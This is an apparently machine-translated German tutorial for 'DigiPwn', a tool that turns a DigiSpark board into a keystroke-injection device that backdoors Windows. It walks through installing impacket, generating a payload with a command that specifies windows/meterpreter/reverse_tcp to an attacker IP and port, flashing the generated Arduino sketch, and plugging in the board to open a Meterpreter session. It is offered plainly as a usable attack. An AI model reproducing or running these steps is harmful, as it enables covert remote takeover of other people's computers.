Inhaltsverzeichnis:
- Lieferungen
- Schritt 1: Klonen Sie das DigiPwn-Repository
- Schritt 2: Impacket installieren [von Python benötigte Module]
- Schritt 3: Generieren Sie die Nutzlast
- Schritt 4: Laden Sie nun den Code auf Arduino hoch
- Schritt 5: Zeit, das Baby anzuschließen
Video: DigiPwn - Gunook
2024 Autor: John Day | [email protected]. Zuletzt bearbeitet: 2024-01-30 07:17
Was machen wir also hier?
DigiSpark ist ein kleines Arduino-basiertes Entwicklungstool, das als HID-Tastatureingabe fungieren kann. Heute manipulieren wir dieses Gerät so, dass es ein Windows-Betriebssystem hintertürig macht!
Lieferungen
Arduino-IDE
Eine Windows-Maschine
DigiSpark
Metasploit-Framework
Python 2.7 (Hinweis: Sie benötigen Python "2.7", keine andere Version)
impack
Gehirn! Es hilft
Schritt 1: Klonen Sie das DigiPwn-Repository
Klonen Sie auf das GitHub-Repository von DigiPwn von
git-Klon
Wechseln Sie nun das Verzeichnis zu DigiPwn von
CD DigiPwn/
Schritt 2: Impacket installieren [von Python benötigte Module]
Dieses Modul ist erforderlich, um den SMB-Server auszuführen, der für die Nutzlastbibliothek erforderlich ist
sudo apt-get install python-impacket
Oder Sie können die Impacket-Bibliothek herunterladen und von hier aus installieren.
Schritt 3: Generieren Sie die Nutzlast
Lauf
python DigiPwn.py [HOST] [PORT] [PAYLOAD] [AUSGABEDATEI] [Format]
Ex
python DigiPwn.py 192.168.1.2 8080 windows/meterpreter/reverse_tcp win.vbs win.vbs
Jetzt werden Sie gefragt, ob Sie den Stager und den SMB-Server starten möchten. Drücke y und drücke Enter
Schritt 4: Laden Sie nun den Code auf Arduino hoch
Bevor wir hochladen, müssen wir sicherstellen, dass das DigiSpark-Board in Arduino installiert ist, um dies hier zu sehen.
Laden Sie danach die vom Skript generierte Datei keystroke_inject.ino hoch. Sobald Sie fertig sind, sind Sie bereit zu
Schritt 5: Zeit, das Baby anzuschließen
Schließen Sie jetzt Ihren DigiSpark an und warten Sie 10 Sekunden
BOOM Es ist eine Meterpreter-Sitzung eröffnet!